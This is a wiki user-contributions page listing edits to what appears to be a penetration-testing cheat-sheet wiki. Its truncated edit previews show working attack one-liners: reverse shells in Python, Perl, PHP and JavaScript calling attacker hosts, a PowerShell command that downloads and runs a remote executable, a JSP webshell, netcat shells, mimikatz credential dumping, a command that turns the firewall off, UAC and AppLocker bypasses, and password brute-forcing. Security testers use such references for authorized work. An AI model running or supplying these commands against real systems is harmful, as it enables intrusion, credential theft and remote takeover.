User contributions

Jump to: navigation, search
Search for contributions
 
 
      
 
   

  • 01:17, 31 October 2019 (diff | hist) . . (+56). . Windows Situational Awareness(WMIC) (current)
  • 02:15, 11 October 2019 (diff | hist) . . (+139). . Main Page(current)
  • 01:01, 11 October 2019 (diff | hist) . . (+1,764). . N Windows Situational Awareness(Created page with "== CMD/Native Binaries == set u net users net users /domain net localgroup net groups /domain net groups /domain "Domain Admins" nslookup -type=any %userdnsdoma...")
  • 05:21, 2 November 2018 (diff | hist) . . (+185). . Windows Privilege Escalation(current)
  • 23:43, 31 July 2018 (diff | hist) . . (+510). . MimiKatz(current)
  • 18:42, 31 July 2018 (diff | hist) . . (+3). . Metasploit(current)
  • 18:41, 31 July 2018 (diff | hist) . . (+11). . Main Page(Metasploit-Fu)
  • 18:41, 31 July 2018 (diff | hist) . . (+6). . Main Page
  • 18:41, 31 July 2018 (diff | hist) . . (+69). . Main Page
  • 18:40, 31 July 2018 (diff | hist) . . (+233). . N Metasploit(Created page with "One-liner to start a reverse https listener msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnS...")
  • 17:26, 29 May 2018 (diff | hist) . . (+2,278). . N WebApp(Created page with "== Jenkins / Hudson == '''Google Dorks:'''<br> ''Public instances: intitle:"Dashboard [Jenkins]"<br> Public instances with no authentication: intitle:"Dashboard [Jenkins]" in...") (current)
  • 17:25, 29 May 2018 (diff | hist) . . (+7,004). . N Windows Privilege Escalation(Created page with "== Automation == [https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip windows-privesc-check] – Windows Privilege Escalation Scanner == Remote == [http...")
  • 17:25, 29 May 2018 (diff | hist) . . (+5,435). . N Applock Bypass(Created page with "Credit: @Oddvarmoe https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/README.md == Rundll32.exe == rundll32.exe javascript:"..\mshtml,RunHTMLApplication "...") (current)
  • 17:24, 29 May 2018 (diff | hist) . . (+1,543). . N UAC Bypass(Created page with "UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting [https://github.com/hfiref0x/UACME https://github.com/hfiref0x/UACME] - [https://githu...") (current)
  • 17:24, 29 May 2018 (diff | hist) . . (+2,366). . N Linux Privilege Escalation(Created page with " == Automation == [https://github.com/ngalongc/AutoLocalPrivilegeEscalation AutoLocalPrivilegeEscalation] script that downloads potential exploits for linux kernel from exploi...") (current)
  • 17:24, 29 May 2018 (diff | hist) . . (+413). . N Mac Privilege Escalation(Created page with " == SIP Bypass OSX 10.11.4 == ln -s /S*/E: A*Li*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li: Ex*/;reboot or ln -s /System/Library/Extensions/AppleKextExcludeList.k...") (current)
  • 17:24, 29 May 2018 (diff | hist) . . (+7,943). . N Powershell(Created page with "== WebDL and execute== powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer http://www.illmob.org/test.exe test.exe;./test.exe; o...") (current)
  • 17:24, 29 May 2018 (diff | hist) . . (+1,976). . N Python(Created page with "== using python to spawn a bash terminal when in a limited www shell: == python -c 'import pty;pty.spawn("/bin/bash")' == Reverse Shell == python -c 'import socket,subproc...") (current)
  • 17:23, 29 May 2018 (diff | hist) . . (+381). . N Perl(Created page with " == Reverse Shell == perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&...") (current)
  • 17:23, 29 May 2018 (diff | hist) . . (+99). . N PHP(Created page with " == Reverse Shell == php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' .") (current)
  • 17:23, 29 May 2018 (diff | hist) . . (+1,016). . N Javascript(Created page with " == Reverseshell == rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://'''<ATT...") (current)
  • 17:23, 29 May 2018 (diff | hist) . . (+145). . N VBS(Created page with " mshta.exe vbscript:close(eval(CreateObject("Scripting.FileSystemObject").OpenTextFile("1.vbs").ReadAll())) cscript.exe //E:vbscript script.txt") (current)
  • 17:22, 29 May 2018 (diff | hist) . . (+107). . N JSP(Created page with " == Tiny JSP Webshell == <%@ Page Language="Jscript"%><%eval(Request.Item["xiao2dsafxad"],"unsafe");%> .") (current)
  • 17:22, 29 May 2018 (diff | hist) . . (+5,675). . N Cmd(Created page with "== Firewall == netsh advfirewall show state <br> netsh advfirewall show config <br> netsh advfirewall set allprofiles state off <br> netsh advfirewall firewall add rule name="...") (current)
  • 17:22, 29 May 2018 (diff | hist) . . (+2,074). . N WMIC(Created page with "== Add Admin User Remotely == wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user” ==...") (current)
  • 17:21, 29 May 2018 (diff | hist) . . (+327). . N OLE(Created page with "== Plant a malicious OLE into a Word document: == $word = New-Object -ComObject Word.Application $word.visible = $true $objDoc = $word.Documents.Add() $objSelection = $wor...") (current)
  • 17:21, 29 May 2018 (diff | hist) . . (+3,527). . N Bash(Created page with " == Victim Info == id && /sbin/ifconfig && uname -a == Check outbound port egress == for ((i=1; i<1024; i++)) do nc -z -v open.zorinaq.com $i | grep "Yep"; done == Reverse...") (current)
  • 17:20, 29 May 2018 (diff | hist) . . (+3,334). . N NMAP(Created page with "== CREATE AN IP LIST == nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt nmap -v -sn 192.168.13.200-254 -oG targets.txt | g...") (current)
  • 17:14, 29 May 2018 (diff | hist) . . (+104). . N Ettercap(Created page with "== Sniff Traffic == ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap eof.") (current)
  • 17:14, 29 May 2018 (diff | hist) . . (+884). . N NETCAT(Created page with "== Shell from windows to linux == [email protected]:~# nc -nv a.b.c.d 4444 c:\User\offsec>nc -nlvp 4444 -e cmd.exe == shell from linux to windows == [email protected]:~# nc -nlvp 4444 -e...") (current)
  • 17:13, 29 May 2018 (diff | hist) . . (+431). . N Hydra(Created page with " == Sonicwall Bruteforce == hydra -l admin -p /usr/share/wordlists/rockyou.txt '''vpn.server.com''' https-post-form "/cgi-bin/userLogin:username=admin&password=^PASS^&domain=...") (current)
  • 17:13, 29 May 2018 (diff | hist) . . (+4,388). . N MimiKatz(Created page with " == One-liner to dump logonpasswords and hashes to mimikatz.log == mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit == l...")
  • 17:12, 29 May 2018 (diff | hist) . . (+282). . N Hashcat(Created page with " == CRACKING WPA/WPA2 PSK == ./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap == Windows Passw...") (current)
  • 17:12, 29 May 2018 (diff | hist) . . (+328). . N John The Ripper(Created page with "== CRACKING WPA/WPA2 PSK == john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap == CRACK PASSWORDS WITH JOHN AND KORELOGIC R...") (current)
  • 17:12, 29 May 2018 (diff | hist) . . (+420). . N Wordlists(Created page with "== pw-inspector == Read in a list of passwords (-i /usr/share/wordlists/nmap.lst) and save to a file (-o /root/passes.txt), selecting passwords of a minimum length of 6 (-m 6)...") (current)
  • 17:11, 29 May 2018 (diff | hist) . . (+57,816). . N Common Findings Database(Created page with "== Crypto == {| class="mw-collapsible mw-collapsed wikitable" ! Block Cipher Uses ECB Mode|| |- | '''Summary''' || A block cipher in ECB mode encrypts every block of plaintext...") (current)
  • 17:11, 29 May 2018 (diff | hist) . . (+2,155). . N Wifi(Created page with "== REAVER / Pixiedust: == reaver -i wlan1mon -c'''<chan#>''' -b '''<MACaddy>''' -vvv -K 1 <br> Let’s put the wifi interface in monitoring mode using: airmon-ng start wlan...") (current)